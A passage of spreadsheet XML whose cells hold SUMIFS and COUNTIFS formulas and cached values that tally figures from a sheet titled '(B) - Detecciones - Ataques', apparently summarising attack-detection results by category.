        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>13</v>
      </c>
      <c r="BB49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>53436</v>
      </c>
      <c r="BD49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>396</v>
      </c>
      <c r="BI49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>19</v>
      </c>
      <c r="BL49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>150331</v>
      </c>
      <c r="BN49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>9152</v>
      </c>
      <c r="BO49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>9</v>
      </c>
      <c r="BT49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>10</v>
      </c>
      <c r="CA49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>3</v>
      </c>
      <c r="CG49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>13</v>
      </c>
      <c r="CL49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>162</v>
      </c>
      <c r="CN49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>8</v>
      </c>
      <c r="CP49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>40</v>
      </c>
      <c r="CQ49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>803</v>
      </c>
      <c r="CT49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>8</v>
      </c>
      <c r="CU49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>9</v>
      </c>
      <c r="CY49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>32</v>
      </c>
      <c r="CZ49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>6</v>
      </c>
      <c r="DF49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>474</v>
      </c>
      <c r="DI49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5505</v>
      </c>
      <c r="DJ49" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>13</v>
      </c>
      <c r="DK49" s="271"/>
      <c r="DO49" s="279"/>
      <c r="DP49" s="271"/>
      <c r="DQ49" s="271"/>
      <c r="DR49" s="271"/>
      <c r="DS49" s="271"/>
      <c r="DT49" s="271"/>
      <c r="DU49" s="271"/>
      <c r="DV49" s="271"/>
      <c r="DW49" s="271"/>
      <c r="DX49" s="271"/>
      <c r="DY49" s="271"/>
      <c r="DZ49" s="271"/>
      <c r="EA49" s="271"/>
      <c r="EB49" s="271"/>
      <c r="EC49" s="271"/>
      <c r="ED49" s="280"/>
      <c r="EG49" s="279"/>
      <c r="EH49" s="271"/>
      <c r="EI49" s="358" t="s">
        <v>2093</v>
      </c>
      <c r="EJ49" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S27 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EK49" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S27 &amp; "*")</f>
        <v>9</v>
      </c>
      <c r="EL49" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S27 &amp; "*")</f>
        <v>11</v>
      </c>
      <c r="EM49" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S27 &amp; "*")</f>
        <v>17</v>
      </c>
      <c r="EN49" s="360">
        <f t="shared" ref="EN49:EN62" si="37">EM49</f>
        <v>17</v>
      </c>
      <c r="EO49" s="364"/>
      <c r="EP49" s="456">
        <f>EN49/EN28</f>
        <v>0.3469387755</v>
      </c>
      <c r="EQ49" s="457">
        <f>1-EP49</f>
        <v>0.6530612245</v>
      </c>
      <c r="ER49" s="427">
        <f>1-(EL49/EL28)</f>
        <v>0.6333333333</v>
      </c>
      <c r="ES49" s="427">
        <f>1-(EK49/EK28)</f>
        <v>0.55</v>
      </c>
      <c r="ET49" s="427">
        <f>1-(EJ49/EJ28)</f>
        <v>0.75</v>
      </c>
      <c r="EU49" s="271"/>
      <c r="EV49" s="326" t="s">
        <v>2448</v>
      </c>
      <c r="EW49" s="327" t="s">
        <v>6</v>
      </c>
      <c r="EX49" s="327" t="s">
        <v>7</v>
      </c>
      <c r="EY49" s="327" t="s">
        <v>8</v>
      </c>
      <c r="EZ49" s="328" t="s">
        <v>9</v>
      </c>
      <c r="FA49" s="280"/>
      <c r="FC49" s="458" t="s">
        <v>2465</v>
      </c>
      <c r="FD49" s="6"/>
      <c r="FE49" s="384">
        <f t="shared" ref="FE49:FH49" si="36">SQRT(FE47*(1-FE48))</f>
        <v>0.1141879325</v>
      </c>
      <c r="FF49" s="384">
        <f t="shared" si="36"/>
        <v>0.270935736</v>
      </c>
      <c r="FG49" s="384">
        <f t="shared" si="36"/>
        <v>0.3316818721</v>
      </c>
      <c r="FH49" s="384">
        <f t="shared" si="36"/>
        <v>0.2515818474</v>
      </c>
      <c r="FK49" s="445"/>
      <c r="FL49" s="359"/>
      <c r="FM49" s="359"/>
      <c r="FN49" s="359"/>
      <c r="FO49" s="359"/>
      <c r="FP49" s="359"/>
      <c r="FY49" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="FZ49" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA49" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GC49" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="GD49" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GE49" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*"))</f>
        <v>0</v>
      </c>
    </row>
    <row r="50">
      <c r="B50" s="277"/>
      <c r="C50" s="271"/>
      <c r="D50" s="271"/>
      <c r="E50" s="271"/>
      <c r="F50" s="271"/>
      <c r="G50" s="278"/>
      <c r="J50" s="277"/>
      <c r="K50" s="434"/>
      <c r="L50" s="353"/>
      <c r="M50" s="353"/>
      <c r="N50" s="354"/>
      <c r="O50" s="278"/>
      <c r="Q50" s="271"/>
      <c r="R50" s="352" t="s">
        <v>2502</v>
      </c>
      <c r="S50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>3712</v>
      </c>
      <c r="T50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>3177</v>
      </c>
      <c r="U50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>137</v>
      </c>
      <c r="V50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>44</v>
      </c>
      <c r="W50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>14</v>
      </c>
      <c r="X50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>53442</v>
      </c>
      <c r="Y50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>423</v>
      </c>
      <c r="Z50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>164337</v>
      </c>
      <c r="AA50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>415</v>
      </c>
      <c r="AB50" s="353">
